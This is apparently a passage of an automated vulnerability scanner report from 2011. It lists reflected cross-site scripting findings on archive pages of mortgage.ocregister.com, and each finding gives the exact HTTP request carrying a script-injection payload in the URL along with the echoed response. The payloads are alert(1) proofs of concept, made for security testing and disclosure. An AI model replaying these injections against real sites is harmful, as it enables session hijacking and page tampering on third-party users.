<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009e5f1d\"><script>alert(1)</script>e69b8dc3898/04/feed/" />
...[SNIP]...

1.292. http://mortgage.ocregister.com/2009/04/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/04/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1a43"><script>alert(1)</script>1a1ab7a0c99 was submitted in the REST URL parameter 2. This input was echoed as b1a43\"><script>alert(1)</script>1a1ab7a0c99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/04b1a43"><script>alert(1)</script>1a1ab7a0c99/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/04b1a43\"><script>alert(1)</script>1a1ab7a0c99/feed/" />
...[SNIP]...

1.293. http://mortgage.ocregister.com/2009/04/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/04/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d59d"><script>alert(1)</script>7366da0a954 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3d59d\"><script>alert(1)</script>7366da0a954 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/04/?3d59d"><script>alert(1)</script>7366da0a954=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 106435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/04/?3d59d\"><script>alert(1)</script>7366da0a954=1feed/" />
...[SNIP]...

1.294. http://mortgage.ocregister.com/2009/05/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/05/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36880"><script>alert(1)</script>180f3a1c883 was submitted in the REST URL parameter 1. This input was echoed as 36880\"><script>alert(1)</script>180f3a1c883 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200936880"><script>alert(1)</script>180f3a1c883/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200936880\"><script>alert(1)</script>180f3a1c883/05/feed/" />
...[SNIP]...

1.295. http://mortgage.ocregister.com/2009/05/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/05/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9e2f"><script>alert(1)</script>c8e7e3442e9 was submitted in the REST URL parameter 2. This input was echoed as f9e2f\"><script>alert(1)</script>c8e7e3442e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/05f9e2f"><script>alert(1)</script>c8e7e3442e9/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/05f9e2f\"><script>alert(1)</script>c8e7e3442e9/feed/" />
...[SNIP]...

1.296. http://mortgage.ocregister.com/2009/05/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/05/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91d00"><script>alert(1)</script>437786ed55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91d00\"><script>alert(1)</script>437786ed55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/05/?91d00"><script>alert(1)</script>437786ed55=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 112123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/05/?91d00\"><script>alert(1)</script>437786ed55=1feed/" />
...[SNIP]...

1.297. http://mortgage.ocregister.com/2009/06/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/06/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9c15"><script>alert(1)</script>ad967443caf was submitted in the REST URL parameter 1. This input was echoed as c9c15\"><script>alert(1)</script>ad967443caf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009c9c15"><script>alert(1)</script>ad967443caf/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009c9c15\"><script>alert(1)</script>ad967443caf/06/feed/" />
...[SNIP]...

1.298. http://mortgage.ocregister.com/2009/06/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/06/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a462c"><script>alert(1)</script>df7a2d0b05a was submitted in the REST URL parameter 2. This input was echoed as a462c\"><script>alert(1)</script>df7a2d0b05a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/06a462c"><script>alert(1)</script>df7a2d0b05a/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/06a462c\"><script>alert(1)</script>df7a2d0b05a/feed/" />
...[SNIP]...

1.299. http://mortgage.ocregister.com/2009/06/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/06/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80c8f"><script>alert(1)</script>e0e37e5be57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80c8f\"><script>alert(1)</script>e0e37e5be57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/06/?80c8f"><script>alert(1)</script>e0e37e5be57=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 114372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/06/?80c8f\"><script>alert(1)</script>e0e37e5be57=1feed/" />
...[SNIP]...

1.300. http://mortgage.ocregister.com/2009/07/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/07/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7881c"><script>alert(1)</script>3c2f217435e was submitted in the REST URL parameter 1. This input was echoed as 7881c\"><script>alert(1)</script>3c2f217435e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20097881c"><script>alert(1)</script>3c2f217435e/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:19 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20097881c\"><script>alert(1)</script>3c2f217435e/07/feed/" />
...[SNIP]...

1.301. http://mortgage.ocregister.com/2009/07/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/07/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4782"><script>alert(1)</script>6666c9a16c7 was submitted in the REST URL parameter 2. This input was echoed as b4782\"><script>alert(1)</script>6666c9a16c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/07b4782"><script>alert(1)</script>6666c9a16c7/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/07b4782\"><script>alert(1)</script>6666c9a16c7/feed/" />
...[SNIP]...

1.302. http://mortgage.ocregister.com/2009/07/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/07/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a46b7"><script>alert(1)</script>653aab2ba5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a46b7\"><script>alert(1)</script>653aab2ba5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/07/?a46b7"><script>alert(1)</script>653aab2ba5c=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 113888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/07/?a46b7\"><script>alert(1)</script>653aab2ba5c=1feed/" />
...[SNIP]...

1.303. http://mortgage.ocregister.com/2009/08/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/08/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e95c"><script>alert(1)</script>65109d80feb was submitted in the REST URL parameter 1. This input was echoed as 2e95c\"><script>alert(1)</script>65109d80feb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20092e95c"><script>alert(1)</script>65109d80feb/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20092e95c\"><script>alert(1)</script>65109d80feb/08/feed/" />
...[SNIP]...

1.304. http://mortgage.ocregister.com/2009/08/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/08/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f3f"><script>alert(1)</script>c6967a59290 was submitted in the REST URL parameter 2. This input was echoed as 41f3f\"><script>alert(1)</script>c6967a59290 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/0841f3f"><script>alert(1)</script>c6967a59290/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/0841f3f\"><script>alert(1)</script>c6967a59290/feed/" />
...[SNIP]...

1.305. http://mortgage.ocregister.com/2009/08/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2009/08/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91a1e"><script>alert(1)</script>468ca413bb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91a1e\"><script>alert(1)</script>468ca413bb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/08/?91a1e"><script>alert(1)</script>468ca413bb4=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2009 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/08/?91a1e\"><script>alert(1)</script>468ca413bb4=1feed/" />
...[SNIP]...

